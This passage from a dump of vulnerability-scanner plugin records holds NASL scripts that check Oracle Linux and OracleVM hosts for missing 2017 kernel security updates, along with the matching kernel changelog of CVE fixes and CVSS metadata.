or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-9710\", \"CVE-2015-1465\", \"CVE-2015-2686\", \"CVE-2015-4167\", \"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000253\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7273\", \"CVE-2017-7308\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3658\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", 
reference:\"kernel-uek-debug-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.298.1.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:43", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[3.8.13-118.20.1.el7uek]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 25392692]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 26479780]\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592025]\n- oracleasm: Copy the integrity descriptor (Martin K. 
Petersen) \n[Orabug: 26649818]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675925] {CVE-2017-7889}\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058468]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069042] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069042] {CVE-2017-12190}\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
\nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3657.NASL", "href": "https://www.tenable.com/plugins/nessus/105144", "published": "2017-12-11T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3657) (BlueBorne) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3657.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105144);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\", 
\"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3657) (BlueBorne) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.8.13-118.20.1.el7uek]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 25392692]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 26479780]\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592025]\n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) \n[Orabug: 26649818]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675925] {CVE-2017-7889}\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058468]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069042] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069042] {CVE-2017-12190}\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n- nvme: Handle PM1725 HIL reset (Martin K. 
Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
\nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: \n26643556] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina \nDubroca) [Orabug: 27011273] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) \n[Orabug: 27002450] {CVE-2017-1000111}\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin \nGuay) [Orabug: 26883934]\n- xen/x86: Add interface for querying amount of host memory (Boris \nOstrovsky) [Orabug: 26883934]\n- Bluetooth: Properly check L2CAP config option output buffer length \n(Ben Seri) [Orabug: 26796364] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645550] \n{CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: \n26638921] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586047] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 
26586022] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session \nkeyrings (David Howells) [Orabug: 26585994] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) \n[Orabug: 26578198] {CVE-2017-9242}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) \n[Orabug: 25507344] {CVE-2016-7097} {CVE-2016-7097}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) \n[Orabug: 26366022] {CVE-2017-7645}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007407.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007408.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.1.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.1.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3657\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.1.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", 
rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.1.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.1.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", 
reference:\"kernel-uek-firmware-3.8.13-118.20.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:19", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - tty: Fix race in pty_write leading to NULL deref (Todd\n Vierling) \n\n - ocfs2/dlm: ignore cleaning the migration mle that is\n inuse (xuejiufei) [Orabug: 26479780]\n\n - KEYS: fix dereferencing NULL payload with nonzero length\n (Eric Biggers) [Orabug: 26592025]\n\n - oracleasm: Copy the integrity descriptor (Martin K.\n Petersen) \n\n - mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook)\n [Orabug: 26675925] (CVE-2017-7889)\n\n - xscore: add dma address check (Zhu Yanjun) [Orabug:\n 27058468]\n\n - more bio_map_user_iov leak fixes (Al Viro) [Orabug:\n 27069042] (CVE-2017-12190)\n\n - fix unbalanced page refcounting in bio_map_user_iov\n (Vitaly Mayatskikh) [Orabug: 27069042] (CVE-2017-12190)\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. 
Petersen)\n [Orabug: 26277600]\n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126]\n\n - ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126]\n\n - ping: implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. 
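Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306]\n\n - timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn't parse nlmsg properly (Xin Long)\n [Orabug: 26988627] (CVE-2017-14489)\n\n - mqueue: fix a use-after-free in sys_mq_notify (Cong\n Wang) [Orabug: 26643556] (CVE-2017-11176)\n\n - ipv6: avoid overflow of offset in ip6_find_1stfragopt\n (Sabrina Dubroca) [Orabug: 27011273] (CVE-2017-7542)\n\n - packet: fix tp_reserve race in packet_set_ring (Willem\n de Bruijn) [Orabug: 27002450] (CVE-2017-1000111)\n\n - mlx4_core: calculate log_num_mtt based on total system\n memory (Wei Lin Guay) [Orabug: 26883934]\n\n - xen/x86: Add interface for querying amount of host\n memory (Boris Ostrovsky) [Orabug: 26883934]\n\n - Bluetooth: Properly check L2CAP config option output\n buffer length (Ben Seri) [Orabug: 26796364]\n (CVE-2017-1000251)\n\n - xen: fix bio vec merging (Roger Pau Monne) [Orabug:\n 26645550] (CVE-2017-12134)\n\n - fs/exec.c: account for argv/envp pointers (Kees Cook)\n [Orabug: 26638921] (CVE-2017-1000365) (CVE-2017-1000365)\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with '.' to be joined\n as session keyrings (David Howells) [Orabug: 26585994]\n (CVE-2016-9604)\n\n - ipv6: fix out of bound writes in __ip6_append_data (Eric\n Dumazet) [Orabug: 26578198] 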